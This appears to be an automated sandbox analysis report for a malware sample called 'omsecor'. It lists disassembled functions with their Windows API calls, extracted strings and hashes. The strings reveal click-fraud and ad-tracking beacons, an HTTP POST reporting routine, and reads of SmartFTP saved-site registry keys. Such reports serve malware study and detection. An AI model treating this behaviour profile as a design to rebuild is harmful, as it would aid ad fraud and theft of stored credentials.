                  • Instruction Fuzzy Hash: 0531C471D00208ABCF20ABA6DC859AE77BAEF80309F10847BE505B72C1DA7849558B5B
                  APIs
                  • _ValidateScopeTableHandlers.LIBCMT ref: 0040D892
                  • __FindPESection.LIBCMT ref: 0040D8AC
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: FindHandlersScopeSectionTableValidate
                  • String ID:
                  • API String ID: 876702719-0
                  • Opcode ID: 534d7b056b49e296d3a3fc6e9a3ba6c277fd5c62c59754af54bacd0a8e696194
                  • Instruction ID: 4070355c3de93ac57746f54d9fb9ba92a54bad1974282013f33c457a7dad05b0
                  • Opcode Fuzzy Hash: 534d7b056b49e296d3a3fc6e9a3ba6c277fd5c62c59754af54bacd0a8e696194
                  • Instruction Fuzzy Hash: 96A1C172F042158BCB24CF98D981B6E77B1EB84314F56813AD815A73D0DB39AC49CB9D
                  APIs
                  • SysFreeString.OLEAUT32(?), ref: 004094E6
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: FreeString
                  • String ID:
                  • API String ID: 3341692771-0
                  • Opcode ID: 99a964074df9a43e7876bfa78059f63c2205d652b6a4e0ea0b2e4f8e9ecac31d
                  • Instruction ID: b8745a711dcf8da59f3798694fa3079dcf63c40c9cdbadd59c4d39193402e254
                  • Opcode Fuzzy Hash: 99a964074df9a43e7876bfa78059f63c2205d652b6a4e0ea0b2e4f8e9ecac31d
                  • Instruction Fuzzy Hash: C9214832A00108BBDB01DFAADC44B9E7BB8EF48345F1484B6E805F71A1D774AE41DB84
                  APIs
                  • SysAllocString.OLEAUT32(?), ref: 00409B00
                  • SysAllocString.OLEAUT32(?), ref: 00409B0E
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: AllocString
                  • String ID: </title>$</url>$<title>$<url>
                  • API String ID: 2525500382-2286408829
                  • Opcode ID: c58bfd32acaee4a5c903d43745ebae325062404d958fadf76014dbdfc3d1efc4
                  • Instruction ID: e94fff7a9c4556839c155ffec7726d55edf757161a42396596b5093e86978141
                  • Opcode Fuzzy Hash: c58bfd32acaee4a5c903d43745ebae325062404d958fadf76014dbdfc3d1efc4
                  • Instruction Fuzzy Hash: 4F01DB7564021CA7DB116A55CC41FD637A8BB44799F044077FA04F32C3E978AA0C4BA4
                  APIs
                    • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                  • Sleep.KERNEL32(00002710), ref: 0040A91C
                  • Sleep.KERNEL32(00002710), ref: 0040AAC1
                  • GetProcessHeap.KERNEL32(00000000,?), ref: 0040AAE9
                  • HeapFree.KERNEL32(00000000), ref: 0040AAF0
                  Strings
                  • jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s, xrefs: 0040A957
                  • 0, xrefs: 0040AA5B
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: HeapSleep$AttemptConnectFreeInternetProcess
                  • String ID: 0$jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s
                  • API String ID: 3713053250-1268808612
                  • Opcode ID: 9ba27d41419271b0192402f6c87428b96ec0abdecb4ecd520169770693f9ee02
                  • Instruction ID: cb73c9a78e41fc00613c6eff30345c36a412e41c8c720ed22b53be089701fd16
                  • Opcode Fuzzy Hash: 9ba27d41419271b0192402f6c87428b96ec0abdecb4ecd520169770693f9ee02
                  • Instruction Fuzzy Hash: 88515072A00218A6CF10EB95DC959DF737DEF44308F40447BF406B7281EB789A958FAA
                  APIs
                  • SysFreeString.OLEAUT32(?), ref: 00409046
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: FreeString
                  • String ID:
                  • API String ID: 3341692771-0
                  • Opcode ID: 8978318f5479d9c6a2128e97229e25f0ab853f53a681c81c746c7dd648e69de9
                  • Instruction ID: 72e70a91572158687df8678bea7e51b1bbf589372677d733e04197d71cfd8d58
                  • Opcode Fuzzy Hash: 8978318f5479d9c6a2128e97229e25f0ab853f53a681c81c746c7dd648e69de9
                  • Instruction Fuzzy Hash: 0B41AE70600216EFDB10DF94C9885AD7BB2FB48309F2048BED581B7251C77A6E92DF08
                  APIs
                  • GetLocalTime.KERNEL32(?), ref: 004074AD
                  • GetLocalTime.KERNEL32(?), ref: 004074B3
                  • GetTimeZoneInformation.KERNEL32(?), ref: 004074EA
                  • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 00407525
                  • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 0040752F
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040754A
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: Time$FileLocalSystem$InformationUnothrow_t@std@@@Zone__ehfuncinfo$??2@
                  • String ID:
                  • API String ID: 3777474486-0
                  • Opcode ID: bce84979032c395480666c2d60b9174811821601ee86a2001902def64962fbd3
                  • Instruction ID: c9ff0a62426275c5a0d4f0aa0fa2549fa158b312224671bef63f429b7f92df75
                  • Opcode Fuzzy Hash: bce84979032c395480666c2d60b9174811821601ee86a2001902def64962fbd3
                  • Instruction Fuzzy Hash: 03112C72D1022DAADF00EBD4DC44AEEB7FCBF48314F04445AE901B7240E7B9A608CBA5
                  APIs
                  • InternetConnectW.WININET(?,00000050,00000000,00000000,00000003,00000000,00000000,?), ref: 00409EA3
                  • HttpOpenRequestW.WININET(00000000,POST,04400100,00000000,00000000,00000000,04400100,00000000), ref: 00409EC3
                  • HttpSendRequestW.WININET(00000000,00000000,00000000,?,?), ref: 00409EDA
                  • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00409F00
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: HttpInternetRequest$ConnectFileOpenReadSend
                  • String ID: POST
                  • API String ID: 961146071-1814004025
                  • Opcode ID: b231c6d6edeafd2a36d4afe3665cd665c01720833af24f413fd8087ba7bf51f5
                  • Instruction ID: 440a75f1c6cd1a7483e62584c22426b42aa3ce760e55699d8a89a0e8c7b72afb
                  • Opcode Fuzzy Hash: b231c6d6edeafd2a36d4afe3665cd665c01720833af24f413fd8087ba7bf51f5
                  • Instruction Fuzzy Hash: B8318E71900119BFDB10DBA4DC84EFE7679EB54349F14087AFA41B62C2D6385E448BA8
                  APIs
                  • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004051EB
                  Strings
                  • SOFTWARE\smartftp\client 2.0\settings\backup, xrefs: 00405168
                  • folder, xrefs: 00405184
                  • SOFTWARE\smartftp\client 2.0\settings\general\favorites, xrefs: 00405157
                  • personal favorites, xrefs: 00405176
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: EnvironmentExpandStrings
                  • String ID: SOFTWARE\smartftp\client 2.0\settings\backup$SOFTWARE\smartftp\client 2.0\settings\general\favorites$folder$personal favorites
                  • API String ID: 237503144-821743658
                  • Opcode ID: d403c6e0ff69697be521eaf543c14185a1ab81bd096a87ce139bc0f4ede75b67
                  • Instruction ID: 0454e2dbaba930a1c05830d090df37f1eb9a44f33d61805f8e12f109ce5a2445
                  • Opcode Fuzzy Hash: d403c6e0ff69697be521eaf543c14185a1ab81bd096a87ce139bc0f4ede75b67
                  • Instruction Fuzzy Hash: 21213E71D00518ABDB10EB95DC41ADFB7BCEB44318F1084B7E514B2181EB389B49CFA9
                  APIs
                  • CoInitialize.OLE32(00000000), ref: 0040A0C0
                  • GetModuleHandleW.KERNEL32(00000000,00000000), ref: 0040A0CE
                  • CreateWindowExW.USER32(00000000,AtlAxWin,Shell.Explorer,80000000,00000000,00000000,000004B0,00000320,00000000,00000000,00000000), ref: 0040A0F3
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: CreateHandleInitializeModuleWindow
                  • String ID: AtlAxWin$Shell.Explorer
                  • API String ID: 950422046-1300462704
                  • Opcode ID: e9b6661190c81bdf072f7cb3f1dc159ab5559684b807faa4a04e62d0e94038f2
                  • Instruction ID: 8885d0d040d3ab3e1edd42f45155a7fe84e7bff231f75e8e802cb7627400a982
                  • Opcode Fuzzy Hash: e9b6661190c81bdf072f7cb3f1dc159ab5559684b807faa4a04e62d0e94038f2
                  • Instruction Fuzzy Hash: 78118F30200200FFD320ABA6CC4CE6B7BBCEFCA711B240579F515EB291D7789801CA65
                  APIs
                  • GetSystemTime.KERNEL32(?,?,000003E8,?,?,?,?,?,?,?,?,?,?,?,00407B63,?), ref: 0040727C
                  • SystemTimeToFileTime.KERNEL32(?,?,?,000003E8,?), ref: 004072C1
                  • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 004072CB
                  • __aulldiv.LIBCMT ref: 004072E3
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: Time$System$File$__aulldiv
                  • String ID: c{@
                  • API String ID: 3735792614-264719814
                  • Opcode ID: a145c05d1847671377470c3096bfc685d9fda3d476ef25e64420ea8c3ac11d0d
                  • Instruction ID: ef19eb4ac8525f4bf2260e0142840e6d018c3cac6eb9bd4f47b1f5cd165e8a78
                  • Opcode Fuzzy Hash: a145c05d1847671377470c3096bfc685d9fda3d476ef25e64420ea8c3ac11d0d
                  • Instruction Fuzzy Hash: D401DE62D1022DAACB01DFE4D984CEFB77DFF44348B00156AE901F7250E7B5AA4887A5
                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040AB93
                  • CharLowerW.USER32(?), ref: 0040ABA0
                  • GetCommandLineW.KERNEL32 ref: 0040ABC0
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: CharCommandFileLineLowerModuleName
                  • String ID: /updatefile3$netprotdrvss.exe
                  • API String ID: 3118597399-3449771660
                  • Opcode ID: a9092c2346d55b23f20d8634028d89874de2ded0d1b8197c9b1551ea588aa001
                  • Instruction ID: 1eba2a713c21f7c79877a49aa3ec6850c44e44909145826ab611dd80b60fa5a6
                  • Opcode Fuzzy Hash: a9092c2346d55b23f20d8634028d89874de2ded0d1b8197c9b1551ea588aa001
                  • Instruction Fuzzy Hash: 41E09B3655021A5AD750FBB1DD07BA633ACFB01705F1049B6A246F10C0EE74D55D4F9D
                  APIs
                  • _memset.LIBCMT ref: 0040A26B
                  • SysAllocString.OLEAUT32(?), ref: 0040A28E
                  • SysAllocString.OLEAUT32(?), ref: 0040A296
                  • SysFreeString.OLEAUT32(00000000), ref: 0040A2CA
                  • SysFreeString.OLEAUT32(?), ref: 0040A2CF
                    • Part of subcall function 00409FB1: GetTickCount.KERNEL32 ref: 00409FCE
                    • Part of subcall function 00409FB1: GetTickCount.KERNEL32 ref: 00409FDE
                    • Part of subcall function 00409FB1: Sleep.KERNEL32(00000064), ref: 00409FEC
                    • Part of subcall function 00409FB1: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409FFB
                    • Part of subcall function 00409FB1: DispatchMessageW.USER32(?), ref: 0040A009
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: String$AllocCountFreeMessageTick$DispatchPeekSleep_memset
                  • String ID:
                  • API String ID: 3143865713-0
                  • Opcode ID: 68495801366515c75ff4f7091ec1779cfaae467043e456767ef3efc9e03748a3
                  • Instruction ID: bfa1c3e5fdaec5be4dfb18607c12502589e7fd5433bac8caf4aacda455aa0499
                  • Opcode Fuzzy Hash: 68495801366515c75ff4f7091ec1779cfaae467043e456767ef3efc9e03748a3
                  • Instruction Fuzzy Hash: 3A118F72D10219ABCB00DFA9DD448DEBBB9FF08354B11456AF415B7290E770AE14CFA4
                  APIs
                  • GetTickCount.KERNEL32 ref: 00409FCE
                  • GetTickCount.KERNEL32 ref: 00409FDE
                  • Sleep.KERNEL32(00000064), ref: 00409FEC
                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409FFB
                  • DispatchMessageW.USER32(?), ref: 0040A009
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: CountMessageTick$DispatchPeekSleep
                  • String ID:
                  • API String ID: 4159783438-0
                  • Opcode ID: 45312298ad5970842c5ee584b14830e042aefe59ca6bdbaf3830585a06b866aa
                  • Instruction ID: c0dc46c0c87f7bc49602bd7d2efae9f565a6f52602c3eafe7569a8fa2f6b8eea
                  • Opcode Fuzzy Hash: 45312298ad5970842c5ee584b14830e042aefe59ca6bdbaf3830585a06b866aa
                  • Instruction Fuzzy Hash: 3F118671D103199ECB10AFF5CC8899F7BB9BB45314B144A7AE161F71E0C778CA118B1A
                  APIs
                  • GetTickCount.KERNEL32 ref: 00409F5B
                  • GetTickCount.KERNEL32 ref: 00409F5F
                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409F72
                  • DispatchMessageW.USER32(?), ref: 00409F80
                  • Sleep.KERNEL32(0000012C), ref: 00409F8D
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: CountMessageTick$DispatchPeekSleep
                  • String ID:
                  • API String ID: 4159783438-0
                  • Opcode ID: ab27e8fd20f0983608bc295b19996ec13099b56f87bcdccced181fb1a6008d05
                  • Instruction ID: 2f378a1af0056e794f94b22e0cd08b0b0b180d2e60cd5d2ebdc62f673b65dbb1
                  • Opcode Fuzzy Hash: ab27e8fd20f0983608bc295b19996ec13099b56f87bcdccced181fb1a6008d05
                  • Instruction Fuzzy Hash: D1F0C872D042149BD714B7F2DD09B7D76A89B45714F104A36F551F70D1CA7CCD148A58
                  APIs
                  • SetFilePointer.KERNEL32(00414F68,00000000,00000000,00000000,UniqueNum,00000001), ref: 00407E09
                  • WriteFile.KERNEL32(00000078,00000064,00000001,00000000), ref: 00407E20
                    • Part of subcall function 00407CD7: GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                    • Part of subcall function 00407CD7: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: File$CreateModuleNamePointerWrite
                  • String ID: UniqueNum$x
                  • API String ID: 594998759-2399716736
                  • Opcode ID: 0d1cac2645660f3edc8ae4858b9aa10093ebf6a3be27c46c4cc389029dd9494e
                  • Instruction ID: 8c5cde1ed6458afa5e70834db293a7f07ca8c6efd1b8e13f0da2095665a79c5a
                  • Opcode Fuzzy Hash: 0d1cac2645660f3edc8ae4858b9aa10093ebf6a3be27c46c4cc389029dd9494e
                  • Instruction Fuzzy Hash: F72129329002186BDF04AB74ED49DDF3B69EF44315F104636FA02E71E1E634D951C799
                  APIs
                  • SysFreeString.OLEAUT32(?), ref: 004094A9
                  • SysFreeString.OLEAUT32(?), ref: 004094AE
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: FreeString
                  • String ID: _blank$an.yandex.ru/count
                  • API String ID: 3341692771-25359924
                  • Opcode ID: 4ab6eb577aae85ed23f24708000ea2df93b57f18851f250654f87edd31753785
                  • Instruction ID: 1eacecae91598e8b756cf85833a4a3bbf756f1dfdfc5fa02fd6c22f827bf3b29
                  • Opcode Fuzzy Hash: 4ab6eb577aae85ed23f24708000ea2df93b57f18851f250654f87edd31753785
                  • Instruction Fuzzy Hash: 28015A35204114BBDB109FA6CD05D9B77A8EF85324724443BBC15E7291E779EE02CA69
                  APIs
                  • SysAllocString.OLEAUT32(?), ref: 00409868
                  • SysAllocString.OLEAUT32(?), ref: 00409876
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: AllocString
                  • String ID: "URL"$"encrypted"
                  • API String ID: 2525500382-4151690107
                  • Opcode ID: f6e867073f93e28a707ce71cee5b1d0d556dab41e30d3c647449298916898aec
                  • Instruction ID: 961e294ab5ae80d7ab2f0271a6faa46f3ea3f555f1d55132cdad114d364c87da
                  • Opcode Fuzzy Hash: f6e867073f93e28a707ce71cee5b1d0d556dab41e30d3c647449298916898aec
                  • Instruction Fuzzy Hash: 62F0D671A0021DA7CF00AB69CC01FD637ECAB4438CF1484B6F904F32C1E974EA098B98
                  APIs
                  • SysAllocString.OLEAUT32(?), ref: 004097ED
                  • SysAllocString.OLEAUT32(?), ref: 004097FB
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: AllocString
                  • String ID: "domain"$"url"
                  • API String ID: 2525500382-2438671658
                  • Opcode ID: 98133a6a8bfb7a18a2a86276567a63b94d588fd2e230135a268bf1c7eb2bd3b5
                  • Instruction ID: 610bf4d9b2292206f8ef054453b19a236663fc5a2da35db14ea77673b97cd822
                  • Opcode Fuzzy Hash: 98133a6a8bfb7a18a2a86276567a63b94d588fd2e230135a268bf1c7eb2bd3b5
                  • Instruction Fuzzy Hash: 08F0A271A0021DA6CF41AAA9CC05FD637E8AB44348F1444B6F908F7281EA78EA188B94
                  APIs
                  • CharLowerW.USER32(?,?,?,?,?), ref: 004095A4
                  • CharLowerW.USER32(?,?,?,?,?,?,?), ref: 004095D8
                  • SysFreeString.OLEAUT32(?), ref: 00409608
                  • SysFreeString.OLEAUT32(?), ref: 0040960D
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: CharFreeLowerString
                  • String ID:
                  • API String ID: 2335467167-0
                  • Opcode ID: ff78d62f8bf35a608bc63f02c9c9fafbc1ea89148f156ec964e1e543baeabb3a
                  • Instruction ID: 6911929459278785efe31e607170db17e103bee024a9a22ae291265c1613d99e
                  • Opcode Fuzzy Hash: ff78d62f8bf35a608bc63f02c9c9fafbc1ea89148f156ec964e1e543baeabb3a
